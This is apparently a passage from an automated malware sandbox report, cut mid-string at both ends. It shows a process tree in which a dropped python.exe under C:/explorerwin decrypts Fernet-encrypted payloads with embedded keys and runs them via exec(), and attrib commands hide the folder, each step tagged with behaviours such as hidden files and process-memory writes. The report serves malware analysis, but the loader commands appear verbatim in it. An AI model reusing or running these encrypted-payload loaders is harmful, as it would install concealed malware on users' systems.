cNNj8IAUFr53_PVGHqbLc3p1hPU7RDXWseYytjAAXjaR7dbod5Nxk6GCDlGvDxYq96j3n2mwwpUWzdIGklGMnCeIwOMrB5ht6Hr25qis6BWVObfXLNsaRBYqdaViYCL0ccs8pKbfLDH0s5S81hGPYY16ub4ysdVp7nBqZhTkKJR785IuQeZJYicir4edc3EDDfMKFJkAtoy5yS0vrOEy1hH6LL3aw3wrsPC5Xsc5YhtEyRulOfAjxtRBEhSpLr-ekgj0DZz16pFZ21LRJw2_EO0Unf4a2_inh99jQPuHBPlw6TVKSn15ncPG4q1CdWBWWdDMtDvTN54unD5iP6DBvGQqPwOGJ5bxyevbPF9QQSamGQRwaD2I-TYgj3A_9sZ60CiyclM6dVOcnpwL8lVLQxwR_3M3LlSvDwFk4G4JTGD6glQJo-Yk7Ji-cu7cpg6vepC1OVvZzWn-rPHa5Jt5isLSgYM8Gltc6TaQK_LZrstI04HO8g_Jt--TCBDDVopoCTnBXoPX7lPoxvyR2BX4SMixQcGpthGtb6KpIimpjvdyENFetnBR-I-duatYHNDaqbjPYdTaOAoRLePo1pk0cDuS1UuCX9Gtl9zAtnwKk4osngMaXaSNsTXGHSbHDnxGKAUPVfv-lIciN9Oc_jy6zJLm1GgeBMFhRbpK_cGDwiZJ-XgzVngR25vDDzaN5zfxaCOYLI3ZKoJPX5DO-E01d39eHx8E7XlJggvEtIPG2OznbnrcXZJEKzBPo7B_U3FxRQQMttw1aLb91bqOp-ktoIC_WERDWpqqQLD1WH9UO81IoBlcqx9ywZq97JFEG-nAVo61U7Tx9oS6xYlvggPhF0gZ56B1nfHfccrHXB5rz3HNxG2xIR4E7S6bgxYZN2kiVQrVwO1QO5uRtHt9EJeTIBoDCN4pFug2jn4EgSRYlumk7bfm6lj0sFjrMbHMvWUEIcPkItJGQuYts9RlnO8Vvx6_lOAsS24pgiXSEka37B_xbT_YmN10G2mP1ds8TCS5JRRlTDAoj8WP0BmbCGJjWo5wS3-9qf3dggtvaXTQnlinUSwthgwDDik93goLmj9A3k2uGGp2VHkIHuF8952EUGOPoYRul9zx-xgVDPYC72juQmq6-JvIvuIV49oHIe-uH7nZvejMcE5y2pPTTwnvh0ieapSJS0HO1hiLOnxN-y8eTsZSHevJJQX2vM6FI-ZEeBPjU6NuyXmxmJmbNLk5fIuhFYZMfDAFhfp70amN0LToIxWkCgp0B8Rlb6JjbKlwP1gjJoPz83swcjvOBLIhZXxWrWMTr71yPWPcZKz3Sg8Sq6odULwkFfxQzP9es9OqiA2pt_tL1C4ThGh_mLGGXUHfUvlz59bdTYXhq75ZHmFjAiZsXvHSgOYnM4PfYgn_qANlPldkp0SCKX9PZr27_1-Gr1Y7ERTB3ft0Xr9noNBmJ1H_ku0Fy95Dx6-OkG97HocgKmrFZ-8uswkWXd2hB6OPd3_RIO4tZf_MBvLE95Sar9Cmb9e3aDl7AEiiJWK412D0ZZ4rBhIxwJbT1qJJEMxsmk4l2rt5dVkP4j7n1zL-UH65fvpAt8ai4q_6Uy7fjpAJKH5Yy1Tb6gFPSP3njmsMg_v-FzxsViE3A2gVKlcOaESYsIg8c7PkUBbQ2dgEGVLYvufhGkpmEhVAI4a5hwGfW2wAMWhUfCYtFRwIhC57Ah6qUy4v7OHtQvhqhoNiIlDi0o3D5uJc8VPq5ZsCaxeGrB_aMS9ZwfOS5iwzRrHbAgGeA2WWjJVR-U28LjpDne3LzOX3MxVt9zBsTdy1z86W8MFTOTT4Zurg5e9hwx47aZFxBnqcnYeMhpJS0qY7JWhF5ZMG406uRe6Ix_cRiSkMYBlo9UvYw9wZjU2Ed6l4IYHYtQU6ZlNE-6-a35xLNO8j9uEGinCN3C2xRO_WJfKx-hxHEwwj9hE6JWPG5lMVm5XjrlP5Aqm2QS6Js8cwcuad8SkSs0U7vVpwoVCofg8HVAmsmHGN2042c5_qCv5axihRSHeMnFeowq98EiceHg6vi_rCLiPBbJemL9aciTGxn-f6AjUDzmRLWbklzoLzcXpa22hRGeLdGupSCnlPBPb37GId_qigIB1uuHWMXp70nmn6XN9ek-OOtDWPQCNOJhTc2QE6nYC-FL4FM2MKpN2_ZhEW9Tg3KeNXKKRK5JdX0G1dOiroZMv29SWDpoE_8o9u4wb2gvNKJvso8bSxTmMBavUaZYkG5TcXIZ6WbA3J8lnomMgdMl0YkKzVd6wwXPKSMgsZTYlOx16hDnqsQma91WchBOSVe_kAcSfHShUGPt23mDQQoZ2zjn9z0fUW69GWxh98pSszX-Xlwcp3iqTXi0xU4DlaG3OTQBlvMHqiDVgl0WdM-reYy-bzmIJNQxA3gBISQo2SchyAfrB86AljoNaWZWBFCE95cpCqlRrB_QFE5jrk8hMnKLrlxzRcrKT9l53CPOn-dFhLvAx4Pdq31_ZXAo1DXgEP4Rljr3oDsKmltxXbV0ay05kA3-h4RE8fwiVyzmGbdsmHNCX9Fvg0w8VhMeAJbZyDtA847MVZfUsA40o0wD8ZQuehaLEzbb8lxTQVM-H4QBOWUR19gl5Xh_3D8TNbEpbVXR3BlOYHprCczqHA6jaSELPHhQ99UT8ChjhpjRtBpKczsng3X_Gr8lHUFQoxrd6O8THKlS3Op2rPE17YvrD2A8wtgqHyoFBThPnv8c7wwN-kj7xIkbBn70J9IX_IZT2ZUjF17W8n6bC1QdgoL8cNTsM9hGAyBnN3DGwcwb8fnIyHGNRezsT40hwE5ZJDdo6ekjuCX_ZTmB-zw1ApZu-cxnwKaGHXF0GhxaQiNhiUbyT9Fyv5q1ZbPRaHG5n7GM_SxonUsMCjvFTPI1G0xS1qThy1d8O0biQQT_uASBsaToRJeltFX3Yr6CJn3R7e6SvPVp_ghxyDGRz3sIi9rOn9SJZknOPkyicX43RNUGSb45NHFzozaaXy1_5Je9Kw4JKHB1hOMFZyZHCZSDqZc3GUgs4DdL3vA6lzDp-Oz_A8lSDM1qvm8T-xjceaRuW5DzPlQAc_1msKyIsp0DViuquFvFj72Dc2iP1L5S6MqTqHCcUOik0y0Izgn3KTPYNhlNZ9ukR2G4hZeFtdg5FXJOVqmYbgwjk5jwYQt1sog8OCg6fwc2AagkzK7bPCxDzQVEGdmSXQZHj-GNxzts1pL6MEMzRyCesDoencuFQmqBuyfpYfrlcyc087sq--51JoCq6dY46OGizociFRYyDq08jo-hua5AQaohnvB4fQXJHs06fr2xNBJf-FHlA9dSr8ueCAS4rl8GYecXC3QOWcXrw-F1FPzcSlFzu2-wMxBBVB0_ZrVUs3b4zDR_F3wfDNsUqSxDNrdBBFqUoPLXf3t8dVNwoK24y-b5t_vFgJlvqybkwkxItkxBVEezJx-OoiQFe7H9G4WNY_6e1r9YY80WdJX15hDLOsyZj2qK1EvktsQ6aYExJDDdjL5CjtUTLtDx0_v-NEJY4sNX__hCPED7Je_Md3raLXPQVBT-Q2QYUhFjYPE6UlRl2N9YQlhqKVxg_uTaRpdA2IUkJGMhoDb0gtr7dYqb-k2NbTsznSZZ5ID1yQNGK_EMFqryrHE3KfqiNtWZ2dNI-1tyGQWkJwh--IExKtbrYVBS37CjcT5giNzxtGfEU7jwEiT8dDuKjCighg6e9HeD3KpuQkilUOZcbKtLb7FfRE32AROeGoDsf09GeqSzf0qBI_q6uoIQjTq1YUU8pGymb2dgri2fZm-waKiVEzcacPu0fcokPWcGtJnqc7TAo6blFDEnFNiVTAalti4qOxGjphyiLNdctcEYBIO4oIIviv_OTXZLiAGyYvTXsKG7htqY3l_pmoljt2Am2KlM7knnrO6Wyvyj7gRUK4x8JlVbLEVCDy00ScV7mFVe9e7BXOjYT8KZuIjakeBn0-JEJwZ_ushgn7DnCBAvaf2iiX73v1c_JNZtidLFbx2LYi3zfMRWUkliDEeerq5pIPLBumUM0fo6ybIibgJYLIUPgQmBweNQEt88XI6zYUh80McnHc4NlUvwVxzNyQFVPcNootchy5ugv7h6O1LF7Y-oSLljbd8iO3T9fiZrSsBsrH82rvAi4Sulmgq33l4aAJ3daR8gAK2T1Md-nB8VO6xPXHljJ6Rdtkj5o2qVTiK27zO_0X4mXHfYHDz6i76Ga-X9GaXlh1w7QGHDkqlmqvqqztp4qB5d5YbSVcB_13onOPCE-AKIkvGiEbuKLMXYE6rJYxqTrTV4IndJ7qBMnhGwkUSQhEQDciTRUTYpsMGDDaGoHi3Y6I96KhOEkGG-UpryaHIYeLp6KVZJhNglaisDWJaiRIhBAojrX2FAjIsbNAHcU_zBm-3OiwPyuXAuu6ZDXp4us63voBJyGNu1u_3ywhumueM98fdkRsnYKJn-P_eGAs5IOe3BBw8iMFwBHimeoEJo14Dc5cCkl3cPVWzlWztH3nWIxXLvbPO9MtNSxwFqF0m_D08iIb5SwFU9Yk5a43DyP5xboFYXz-viRCXvi_nVvsDNWrRMEx0EZ45JqHNDXErfpqEQyR_HHsVodlt08Zv4yTpP0j7eaL280gnT8NMAUMAEiogNCOFmJZ2qiqxQS_Tc3TF98_E3cibQv42rPSybJ4UFEByK1IjyFzZzCylW4-1kCvztFDuSvR6bMm6cxubmVoU9wWDscYeYzl7lTX6ByNi_QT6eUoVgySm4b_qsY4TSiPQlYOQi1kBn-XGLuq9KpCPW8Q90vfvkZKKwB-GLzR4VBU7PvZr_m5XQcSdUyJGclMvmfm1VBVvEevFTwYZ7JmgTj15Hp1-2B0HMgRpDnEnbn0NeUkG2bwcdF8uPqFyhxj3nxlu5Yzk2EWYOFdQraEyg98xZz52cBU6YFmYg9osLQ1--T_jmkdPMNAJUAnorB-MxRtBqPsoMlZ4DIcIaXuWrJxsb9i3xpCQdFuPjsvjAMLsxKCQybzTa6Z34SzFrRVB17kQgp8rXVkViWtUhQT7O7fefR_6TSoCIk17vYo-y-vk-Fm-nJja2uHH7nGLLsXa7VAWYuMyIIOdTKAPKaT_B9f_VtZgSXd93WWR-zp-jSvtzctghYQq8IKnBqnGFNIiG9Kee968mzvg5P-l7oVn1XmaPRlU9RpITwAR7yFwlYqv4MN6fKQqaxWNvvVPMMPx0z3sJws5mUL5dm7qM5Bs0Ny1bAR33kghRMXei3O6vRq0TuGp0u_vnSZheAHquLKQYqpPlPsxp3XLPohT1fjPK2lladaaKRTnL2WjXjd0uSzWh0mSx_gfbU0Xi-_gUS7cRQ8juuK7dccjxQwIp0Va9VguyhVz1e8x1vBvDN_y19a1daAEXNOAbOaCB2YdKRL66_gcMDS4ZvpROGpW6Yyn1HMrkVT3ZKro5w=='))"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Network Service Discovery
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1772
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:/explorerwin""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3580
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +s "C:/explorerwin"
        5⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:3844
- - C:\explorerwin\python.exe
    "C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'ViriKlkg22n1ztfawqmpxUymLAlW_I5_g41x7FLJOnE=').decrypt(b'gAAAAABmYRmUseFMTSHeK75BTYjbbQl6P1slqj7DOSLUylY2GuS_G-aTGYEifUWIZQbkQYXXkIaTrHx0f0yJVkwhYXcqFNDluYYMBaXOfLaErV3zkW1mpfILNvIFPZIvTfViKKv0MqvL3kCKWlKLKGdGR370BwJMaiXIKfqPBkaO-c0YgsX2Ot0c5Q-Wn6PPsxE4Ih7WE7N2smYKjVKMKXuepZqL2PDxcFGSCtutZbui-8ebhnJv4eFSowEEhZApoWLZR1TRrUwlCkVnXzK0FvcgaO-LNjc0mzbHfcs97-QYTJVVB90sr8jo3LhvSbqfhwnehJD-dzmaD1YGjgpKbZsjcgdHb3EBytjAPWlOD6S212KxlS4OThk1Q7L7WvIQHM1ctdEZWQq89ktF9gug0vhoTfYgV8bY_nu2OGFxrVkAyHhYH6GUco-LABj68EVnjtAZyQdVxYi0wMRj35rnV6l5_tqQLbbelhEfIUyd6fT5caPsvDo_8g_Wh8qVT7dH2Nu2U858GMIA2x5RL8S_Zu7v6AL5rSk62lv5CmRTff4LMzMvWhJqIUnmyZBIdw2pZKhhaIev6azan5mEDIzxGBVmw5AZ7uYtaqKTLfZIQeOY0sqUrKNPtewy-dM1TrDq5eL46bfj9OKIS4RSXaaLYXlEPMvt52fgCUzXGMbLAXKa1LbcQjo9dWejBpLZ7LgwvNPEeuvWssRgGnzeBJXU6qRy7gIIZuqJaMSwfp4JOK4k1QJXt6DUOxvf_xFR-w90OSQ7pgpRZxOqmvXccImyhfISz2xeW5Lir7v7qaSsZXUuN-QH-d8A0XePAmvUHnwDkDJB6wEaMMD5yv5j9BwTo0oj4IjFzo1QpxoAdhF0iPmWwOFquyghgb5KsOyYOViTMM__mA-Pjg_z12UnsxyvpkWnuT640UF8ht4Yak5JcKIOKdcBZCux70sW0K4jKDOF4dgicGAExRWWODybG_saRcvQXInCsInsyr7Bt2JcwkmsaxS9sWe9m9-spt9EySs6BOX2iX9KZ45CGrh0yzLlzbMhKgDjy0hu0pjX1qN6-pM5h6rVMGAMzGvUVeOicM3KOQNcq5siam2eI40mD85wlP7HE5AVk40YZtC2JsRKmRSIm167MIQGJyi_MZhGomqVmGYFHUz-fRY3ebN0OCKONbldiKQ-nSg13B3Lufntni4Ms0FwcPM1VUWUNcWpA4J9cUQohWrhQ1xVIaMd_-eLC1ymUfCF7iVLQ0ucJX9Meyh_h2RjVrkqUjDpaEB97Tc63RKd32mnbz3Hv-vvjyQAoqVl_fVyZ4MD7XnllFEf60u17tsteIHGNK5AxrpNuk42XRKJ8hpwjY4V7ptCzboU_IxAWIkF6Tal_2e_u4ac8K3bmztuXknR1x50nOfpKN_Gk0YYYwsUO4EIPi16z9bvjry5vseoElLTfgVMfAJpjhGIc4LMeuGNyWqHDEkwKM8mvAQBdXYzd3VpoI9ljmUwhSw70QsXIhJgNzfxHrH2ig418FeMyl7HqD2kI8W1pTZT_RKISnssWOQp2Nnvt_BBgnzvxcnDG0QhkQeucsEbtZeU5TD9GrTTFViAILurTZ8gH-jc-O5nfdlQfSAa-Dp3zHybJMGsaH5kznDbJehWJ2TGwU43gglkTDh_VDc-dqXvenOGCKQvVUYe--oVrGqoNaMPXXRCSkNFCf3ncZ9MZH4hDQbGZK8Id9jhbm1PIuZtxpC7pO_ro30ZWLcQdqBfkLvn0-lnEOHIDWYrW-DN0AoieuVyMYjB4yVf8HxGUNdS8OEXkhpd0rSpI0aqlARGI40OyLDpDJWPYncIZHPFWzJlJnyDzVuV3EdfWCRzvcCknOWRNEsRVzeowhFAoBavMcvqOG53O810RkswWl5Jpd_hj5UfrmlXJg_igET3Xup_S0pkHQqCqH9hNDsQZEGGxscK0VArZZ9AL22TpZ8Dvtn9aeTEKyvMoB5MXyCvhNiN5r_MPS88KoiPHUyjK0qvh-GxaU--FCRXInPjhVGIrF28l89O81OcCXBIzzFFI1aUafdrdHt0ltOl7arb9SupsD2tlTw_OyvyVUF6THjUworoWaztg8h0SJYBITypk3xk_0rW-U6g1qeAbjKBfoK6rCgaeR-h1gLYa4PaL8Su7HsZYsUpaSoWTPhYDwRzj_grJHocL_qNFbtnrcgSaGHLUV_UN3RPw2lOwCquh-ypNg7F9A3Wlxubeqpjc0IwDLLreC6QYgBNaMO5HH-XgjTKhF0Yt0pKestIAPLVT3Mw4spK8v89C9w57QzH5tK0YWRA2FoqsMSLKkF0QWviycvxoV9h4WO5ibZ1g7qpcj-uvdoaaK8jroybv6ZxKifVNEMEzRTSpiFcgMnx9tC28hZofxxmKudllW_GUdYqcgX6fP3bw2o_PJQ86vlCDKtYooh9t3ckleK8UxJQhwr1gEdoFgaYKOVcK5VmU-cqrKDY7S9CQ4AhZh3vUPjTBGg-YqCuftnQ4IBgDQQ-GbNDhgzOPZ6vt9XtyQvm9Fe7zWvK-5ZVnChPEXqNQRzb6aElxddLmlfs9yPLZXEWBvmAqLAnmk9d9T3or9Se9bLjvPwWe60gFg55Ec-HKU4uhuz_suFGI3yBASgDnPe9nh8CJkki6l18iJlZO09lOaf9R0daRRECChzQM4t8vmBFKSjmmTXd-gK5Zl3DNyj2sszVJDkHfGSgq6mmN-1SXsxmSI0DmFr6juDVZaQqsqbc9Ia3lRO6D4ay6SUQ9sJQOdU6yYEt2kPzpnBRDi7u9Hf7Tylf6LwK9e8m19dQ6FDdBQ3KG3AAWRuXzYFFo2d345CixnFWi4H_wMyNf7gkir2hAajG4vMK_QZ60WSMG-zviFdTgYEBK3T7Lwp2ZXcRTXd5IC3awoH8I09IcJ8dmOT4bgb4-wxJ5ceA782qftn7xHzXIxT6hnCuybpJ10OV1FAnf-ZnUG_GoColMRHTIqKwJOs1XVJ1vtpYxxzRaT9YP3C_tqnAwfavBDLv5xROlLQ1yDHwukmLslufWlCta77CSwmS_TVvDvliNp-IlKe12cITmAJhCBlCJmFE3d2JfqugemjEj_iAKphMdpbdpGkTau1Fo_K_LjDhrWRa1AcM2vQ3fu0lmbQfYztSZZb5cnaTl770F52nA1mr2RGtoCEqDltsr8EHrvNl6K1ETV1Ut-wKWjdjsTx95OBlDroqDf6BtoV7UysetujdEUC34FUy_yeyrEBv-q5n0OAsoLq52NN7vrEf7b_GS-k3XBQCiXLNGdCZLrFwSdpHq-NyGhL7O3pjfmDeHufFjRwugLvAPi5iFE8jsM6u8olDNJloQ2TEd0ewWqmO5_GFStCAyAD2V1RS3FvwVqYR8_wik7MNq2vrXOE1KWM74hPAvnU4v2UpCa6UmSBgyTMO8-dFkq9I56tx61LwNLqx6I1vwuOeXJPEllDQfCz_KHRk6oVXXs9_vvSlSbEaTzwVb7KSWUwB5kplK3NijyqO3xDLEsnJGqssw2U9DEBd1mmFojlECNEfmf3B_vaIQn9UHRHN2-y0Fgm6qHNu6eZkwuassVPZV1v3cWqzwuFY_qLc33JjIqtL72nzK1NBsnp2m2AtNSWsAmAVeL8Y0eCMVGKynTOmx7Da3cS0PqXXzfR4JrbFmUV3rSLLKPWKR4yBZENPAChH1dtlB4BCsa9er_gi_r9PppgUVLZ2L3FcLIm8tlksH56FSNR8wY1StHniVL_KIcLsSRYGU2RZqT-1IH3gpZdjqH-jlkxxErWzZpyeRUPF-RNcy0ZCuT_KfW_qGCP-901MDay2Z2yU_izrns31laTa6ir_Q_mLIw4pWJLSFxvtjLnZJfKdW0aFjLlMYJrgGv3mt2_QCCmysvwYOJfImNPvO_VrRc9-uXouN9TW9F65IYnOtnxN_bNYnn0ztGu0-Y43XFrdqftH_uk7s_xoPV3R6WVo4kKdrYQSbaek_SlLgaNliSzKfrsl1AX4Cu7NZyKxZ7qoVdOAsPgupyfCwQYNFES0GyDEBe2wf5eqOh-XmFSNL7Y7LZnVrqb2GcueHB_DCwWCIKVYqjbdF4ScWVa1TsqdES5XIZpaOmEOTNfVGP7nQg29vqnoikJzn2l1IDxs7XEMBdQJL_qiknzUlF4om4xP1kLFjZWkFQnamS8ccF8qQtDEO6CvHovytAnVVORtRjqRfE3JC2IpxFdtLEfWrqBueDnFJ3-UMvNvFcDpg_O6zAassTEiz1rrayKpX6kfjV5__KXArvOQIfIWSq35YCK8HfsGsP1Z0_C1ryTRdrWaqABrVnIovInaG4wQai1rXD13oxPzuoSniBMTh0MgEARPX50ihLScGPGzIT6J6GJjG9HH0x_Tc-lkj-52Blz-wwE2n4dkNCe6Uga2IJiLyV-6OjVP-VoppPUlDvD_Ywhkxe3VPfaJ6zj2O5AzdzUyPGZI8iJpuMRtApcPUds3E79WgehusM3PoDkIH-fB3sZlbytBD9Iv4GImj5aN0H5xnGO9nCUPa3nsb_NqEKpcfuR1pkFfxnVUYznH3T_5ABxj8RYZgJ_3XHFqS9rpDep9TcQCU7dFOKLoaYr-ZyNhZxoOqPINQ1w5mkm9sxG0efv12UJu05uBjm005XECs5qmYYOOLC9ryOwkhMDaUEzFZaOgIGN4AEKKBX3FsneLO0xZFg_k5e7ifYpVshzcWXTIfNnPzdO6noGq50-Egrlv0NXp6nwvIKparzEEcghJKNj5m5KTiRC_jIHdRdlqKfPt791-HthSU5OZnezee0WL3pOUR-5HhqapysWhnvHVWAVzyKeMBRv1GOmd5QVS9zyEw52MQKTENmZ95djihvVPheMujGqYJ0rlsPC9jUDszJXhQAES_I3IixLJHeReeksWzZR7ASxiJ2ljNXvKSQK4iOsElwTP0MKRibQUQ0QtfHVWyEKy-SM9qkxA7pGLvT1yhoUqqT9SQ2pZLjRa4KL5A4jOkENRXlEq67s-hxD3SA6FZFCP08ToN-j0MP7J_Lm1NKfrz14pXkAJ_u8qHIJCE3AJJKYYpedbYBybz7Tq-Oz8aHTK0feLTh4zSs8CT2OnT6rS9nR2KdGRz48S5hFJjFm5LtQ4wJE1ibZTjPxJscVUtS4hNGqIj8s9LsLdhpvkIJVMKgSDdo6piNWSnqpHbpluEzvWqckkEoQFDO8pb_AIKA1dMz3iBAxSBaGSSO-x_aapN3m_5fB7osu8MsWjpJx6aSeQOXtOSFEGM0bQdQpfUIBsgl0saaPs2M5KyycUqI278171tYEyX2Fp1IQPiOEMiLe6MI5QP8koPBQmHlQ8HgROxfEELcWPT4YczsKdpz_kkrSx26yxlBQaKISo_jf6yOQew3kweohpe8rCH1Je6lWgWyN5lQlWOLlnH0b2HCYfUZQZnsYoV_32TaNnFRUqdmLFZKgn3bTwoSbOwTiJx3WGR2aZnczkFmuqzS7xxWqTWNTMclwLHwHgPIQeHQTg7xTgWoW5t5aZH6SLs3yHMu8bmdaTK0Hu-w6voig1Kma5sFrQbJZR9QBgQANfJRVJV9cpReveXhML4vuVbqptw1kJF3Ob9_h-U9x0-EUXu4BgyWeW7_fBM7SeuNicTcLunWFD2AKDxIARIm-G91XdNWRgYYMxGQqrs7L_V1IMJNH6-xG2-qChZE8cwb5KzGt2dYSsmI1oNw60dOc6gAhXeLNA80QjjNL9tV2Qs-Fx-oOhT6qUdk8xQ6ra59iiuzZbCUAzjkMLc5-2oKQBZrhV0gu2iQXN2OVGGimFxeHbahGmITpR3fBGlvdkJnCbOiJAMy4vYJKZz5qWCguFKRw8dieoNCAhzcVZRQJPK0k9yYrNsuIrLhg4obTEQI5gTab9LiP5mowt3EqZKPAwMe2Ja7FBCLLqaEjaamRgZsZpsFplACnPEFi--IWcWSiM9IKNmZKOPT7nLmq4KpDOQONZ8dG8sbvrnryaJo6q1oDNgrmDqWx02sJ1D0pp78GZepBEyR_rw5i221lYb6ooNf4OzCzTsrW8KmoyxLh5QaNfJpbWk8vsD0eWvoIHnmiWGJd3qit8sIVzKKIcR4uGLnwcx-K4yKMlJI33nJ1Xio5H2IFWbanSEsC8gyLyDPSerJLKz8r5dOjWMaTgCSsONEly5QGueI0CSQEJDuQx3XLTjojQnklKDJhy8fKbeAf1ZXh3rY60UAbJ8jzKcauyQx3XpXMoVT0ZLl2ZHVYHKyG1OxJVN99vSgCSFjnlH9kBx3TdryrdMSpIYB9TbbUOU7MBM8VFwM1TnYgNnSJ1WcZEQq4SlsAY5XU2fhtpOnyBhvA8mrbtd0P-338dDsRIW6PffEfgzUV-ej9LGWO2gJj4AnjduXzTyejtH4fInjP1mGYv0jwQaVRmvnzTGqI31WyzI-2RRKRfJrNRFYqu2Q=='))"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Network Service Discovery
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:/explorerwi""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2312
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +s "C:/explorerwi"
        5⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2164
- - C:\explorerwin\python.exe
    "C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'PFEb2Ao_jLL5_G5rAQ1I7A2BHguUlElphEwsGEaRwj4=').decrypt(b'gAAAAABmfoINJVlXvqn2brsvCgKzfkB-g59upowhKnCCk52XBPXnUmVptfmoa6iIO-klvSPReT6pqVUXZMFf0Aj74ex1plnzU3BuQ6ezkTh_Mdrm0GS7K3f6F2S47qvHkLPuANBORie0cgyH6vPMILeyjPoiS0mBuJHDl36qy-2x7p8rkUx37BtFbZY8lf8V3-T8JQoo-SEIuGAWvqdZj1YunvT0czyL4aTPTx7WI5JIEMuVZHmigpF7dFL11U1fBG2q8dq9tpZVNL5HP_Ar8QdQeqwdbosftfU2nyEMigWIxgZCOm5MX6qQ6SyH3ziICr6GghRBt02k5wTil7tWNzfGr2oN4se0XAyQ73UwFpq4uPlmF0plfLX1XFp7FvQzv0iZEE0oEx2-MzYzIrw7PBEROajIDXoX5HaDNgHT8yBSIRaYBpzon9W8C5XP9A2hPzyiPC7cmtj8DJvSqaBQ4CUyEyMHMetlv1lDTvsmFj8kvcFyj9QRvGax-ZhKCU5eLEtxIokop02P39ichBPyvluSS6G4h73pYIZGN-AAPxvnDn9rPxy7BZLJ2ev5aBcO3HWpes2chDDoSqZ5uQUUqm2el7eWRj75lZPfToAlD2Wq6mvZOuRzkczeEXQ1PZ5xaz_MF0kcJopLBGCAgiW_TyeRFVEqyfxtaZIeGwKFebVNEBJjT92_PtQOmsNVx-HLS3pgtvqAG96fTrleJfb0NyS9QR-cNvNMsEihEIrlQiaES3jy5bkLYwClMDdjJSXOuVCGtX4cpZ4AgDEt9a9a3IlNQnQBtjWhgM4noOrxkKwP2rRu1-89txPqGt_ZHqZnJbv6647UoNCtdWN1otZ8Ge1-eNM1Om4gz-gnfYV4ZqDoT7LEyUxTA9tNMdUVI8kdg97bEBh_ZMUw4BFATs_qiS2Iidi5vqePB0tt-UpI1lsEljUSqXNpvLErSJfWHQPXUhB60xe-vL8PNcyFjN9dEz1ffhggaA6bwKSQ4zDoHpMLLLXxi8gVpzczWEgmP9Vy6GK7cTADgAkK0TweY30x1e0rLa7iG6o2-SOO5WauMRr6Vuo92jsMIzQ8FfMr9tmQVf8L-NWKOcAv_CmRGBC81tGoDSaQMTSh5cVQvDnSokXQ_SNE33O31U5UW8HGZCruRp6g0umt2fQIgwOryfJZ1wCDYU8r5pnVZOcRls1EcyjC5A9E4Tr6bbpaVKQGFvv66FppGvL8Fq4k-kHNLYyzXL7nQfh9oGUnpQe2c1J0hs0Og1GRo0rk1booAN18jW8oqtTf-QAx0yU99KH6smwhONcJKXmARG4l5htav-iHH2kaiTVVih7YEqS55zHBXICTffcZY1L9G2LfWI11H13Ply2335rGsDcC0vDsQMaOVo7B3aLWBonSkOxY4T_VUnkVK5J0d-D4QHChxKEHw-0duZndQy1P9phxa_1zT6u1H_wYstF2FQJYXvaOLKIqUcCYtaeVbSMZt68nmozLQ5u01CAyeW3gl5Y0O_ngfMSqq-NPCpoGyYxdNguPrutjqKqGtF49aqvBlhziSSiH9N3JgFUhzIkhm5k33tKGnC6DB32HTjCOJYtjlIih7Lj26pKOSiYH_YuH55J3jKlu70kdJg9HuLXlgH87k39lUleDke_q1AVbodQgVLuijFdCE009Tu9CknCcQH0ok6Zz5EoyMjY8F48l4Wl2RIm8YvVE30E6Rvz7upCo5LJoCn264p24nyYGbZCuB4iAv6vaAzr3kGSBT4dh7mGu3UlnFzREC-ZTM5y85I8qPYUiYuVPsIQxf6nEwPTnI3QGsXge37xHaMMQ9ZMU7tnE0T0X9kLhK9OUic_OOVyKKDUC_VHqX2d0BZXPDC-O0KQPjvGG-NGT-LUUUDIuaFnpEd4wBfYJKQi32Xi1oL5jWWGOPBFmGMxKtmjQruzF-hPa09gQ9rYLGj3HO-nYadnAZLbi-tIHesyxgNwU7KPzOBrxBwNt_VY2rD6B1ujVtWeORFf3PR5BpCJN5bPkb5gLbXhqN9GMTV_UUYfqsWJ_xGfgTwU0Wwc4VjRNFlN57BQj_U-wijDrSfn5ld_CdTpQ2mrGP04syMjfyC-bXA54nACQ6IpfBJyKDzJLS3TtUeE3zNdysVuXuD42rYnWOT_4ycfoqOCWVrGcD3PnFHbq_O5Lt2P7-nLxvPze4LjVED5WmLzUDilvRbOqJHhhCXtcGal9iQw27iFl4MwFsVidU7T-KTkn-bQ-6JB_B6yTDtfqlCitVc-DvpNfoFCHXeUbR_CnxnQQmz_P-pMVFEXRpvD_Tp7HdDSjJ7NMpUtqxKllSx8aRNr_269_eQU8NX5JbS-zb17YnIhBXOLPHBAm6ngyecnpSbA5qbFBlyx4GLINrIrbhn2a5LbbWmDrxtbNiTPO-M3uoZkVlpf6-2mkIPV1Hi-6nNd3Hjk0q3xSRnw7Gl7tnmGs6-2JsDYiM1kqivofCc5CZryfebPEw3ipGLhhuCfI8KdyaYWQTDRQ2iJ4rpy8y1ybzerrYet7N2DZwWlxPLDWzk00zH_gvkmmKU9-olXFq8FOU3qGZ8tToDTpi8_-ULvqUvn4BEHqsDHZIAKjKnIjObKrDJIc8XluQlmGpqF-L-vbZz7kl-s7JRUKZ-blhizlhsN8EeSUdtP_8g7hQ0AvF93LpKAMG7X576uDxWmFd1S8D1mr4um79DHyu9Tvr8IS5KCrQuPOKnh5hR-AZNkZerwmoR6ANUGOl7bR8Chbd7NMOHHqvtaeE61pM6QNBjmxlVD2lS26xEgXGAMFMS1B49lrrS7Det6ms3ym8ABPJQwdbiwjTr8FkboFZUYwAckwVBNC-_GUeludRA61VQrkWKt6YrAGMAvqSuLpN6sZq9Tk80ZDjYR7n6qrHA_gSf21tC3Ft-8hDUMKhJ8QLJlYULIKkwJj2WR8SFZVJYAb-QZLpQCEuTcTRpRLFvVkk_Ysb3g3BqOEt1rrKd2QgYUCIi3g